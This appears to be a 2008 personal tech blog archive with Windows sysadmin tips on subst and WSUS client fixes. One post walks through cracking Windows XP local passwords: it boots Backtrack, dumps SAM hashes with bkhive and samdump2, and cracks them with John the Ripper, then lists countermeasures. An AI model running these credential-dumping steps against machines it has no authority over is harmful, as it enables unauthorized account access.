Archive for October, 2008


DOS command: subst – directory shortcut as drive

To assign a drive letter for one of your directory in Windows, for faster (shortcut) access:

subst [drive letter] [directory path]
New drive:- E:\
Directory:- C:\WINDOWS

subst e: c:\WINDOWS

In order to delete a drive which created by subst:

subst [drive letter] /D

subst e: /D


Cracking WindowsXP local user password with Backtrack 3

Cracking job become easy when Backtrack Linux distro come in place, and it get easier when you want crack password saved in WinXP.

Windows XP stored it username and password information in file named SAM at %SystemDrive%:\Windows\system32\config\. The SAM file is encrypted using LM hashes, which is vulnerable to rainbow table attack and bruteforce attack.

Insert the Backtrack3 CD/USB, make it a live boot up.

When you get into Backtrack 3 Desktop

On the console, type

df *to view the harddisk partition distribution on, you may find your Windows system stored at partition /mnt/hda1 (usually, as used for example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *bkhive manual
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing dumped password harsh file
cat ~/Desktop/password.txt

You will see the usersname and the hash values of the SAM file.

There are multiple way to crack the hash (johntheripper, rainbow table, LCP). Over here, we use john the ripper as example.

john ~/Desktop/password.txt –users=Administrator (Administrator is the example user name)

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasure for the attack:

  • Set boot-up password on BIOS to prevent unauthorized live boot up using CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. Strong password means combination of alphanumeric(01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length, will take much longer time (sometimes may be impossible to crack, like password “%a^&b*&e^$5*45*&^%<%” for medium-size rainbow table) to do its job.

Reference and credits to:

  1. Password Cracking Lab – Gary Neubauer II –
  2. Offline Windows password and Registry Editor
  3. Windows XP Menggunakan Linux Backtrack 3 beta
  4. How To: Crack Windows Passwords From SAM and SYSTEM Files, With Backtrack Installed
  5. DIY: Ripping off Windows XP using Backtrack Linux in 10 mins

WSUS client not connecting to the server – 2

Prior to the post stating about WSUS client, there are some additional information for this issue:

WSUS 3.0 won’t work on Windows 2000 or below, it only works on Windows 2003. For lower OS, use WSUS 2.0, which .Net framework is not requried.

WSUS2.0 may require SQL desktop engine, which is a free version of SQL server software developed by Microsoft.

3 items needed for WSUS 2.0

WSUS 2.0 SP1

More information: Wikipedia: MSDE Akadia: MSDE Microsoft: Download MSDE

Some workaround may needed for WSUS clients to reconnect to WSUS server:

Delete Software Distribution folder and WindowsUpdate.log file from %System roor%:\Windows\


WSUS client not connecting to the server

In order to save bandwidth, it is preferable to have a WSUS server at home, which hosts all the windows updates. I indeed learnt a lot In the process to make it works, like installing IIS, .net framework 2.0, install and configure WSUS3.0, synchronise, approve/decline the update, apply to computer groups.

The WSUS console doesn’t work properly often after server reboot. There are three ways to tackle the problems:

1. in command prompt, type iisreset. If it doesn’t work, reboot the server again.

2. If problem persists, uninstall and reinstall WSUS (retain all database and update, it takes weeks to download these GBs of updates).

3. If uninstall/reinstall wsus doesn’t help, uninstall .Net framework and the reinstall it (of course you need to uninstall wsus first). It won’t take you much manual step to fix the problem, but the time to watch the process going on.

Ok, when the server is working properly. The client may not work! I tried to configure a desktop(call it Lousy) of my home network to subscribe wsus update, like I did in another desktop, by configuring Local Group Policy, but it didn’t work.

Basic step to force Windows update:

net stop bits
net stop wuauserv

net start bits
net start wuauserv
wuauclt /resetauthorization /detectnow

By checking the computer table on server, which Lousy is not found. There are various ways to troubleshoot it.

First, it might be firewall problem that prohibit the WSUS connection. You may need to configure your firewall to allow http traffic to the server. To verify the this problem, simply type your wsus URL (http://yourwsusserver/ or http://yourwsusserver:8530). Don’t expect WSUS webpage to give your fancy interface (default setting). I got the response as below, show that I can connect to the webpage (but the web server refuse for Directory Listing).

If firewall is not the problem, then the client definitely does. You may download WSUS Client Diagnostics Tools from Microsoft. Extract the exe file to c:\ (any location will do the same, just c: is preferable for command prompt execution). Run it in command prompt, and watch out the result.

The result may show that OpenedNameService is not installed after first check (local admin right to execute windows update). After researching the result, it sounds like windows update client is not up-to-date. Thus, WindowsUpdateAgent3.0 is downloaded from Microsoft website.

Surprisingly, the installation on WindowsUpdateAgent3.0 show that the Windows Update Client Agent is up to date, which the installation is not required.

I tried several methods listed in various technical forum regarding this problem, and I tried not to modify the system registry before every solution failed. It could be a one way street for registry modification, so be careful.

Finally, I found it is working as below:

regsvr32 /u wuaueng1.dll (this will unregister the wuauserv!)
regsvr32 wuaueng1.dll (this will register wuauserv again)

Verified if it works:

net stop bits
net stop wuausrv

net start bits
net start wuauserv
wuauclt /resetauthorization /detectnow

Check the table on WSUS server console, Lousy is there!

It solved my problem, may not yours. To solve your problem, do remember one thing: Google is your best friend!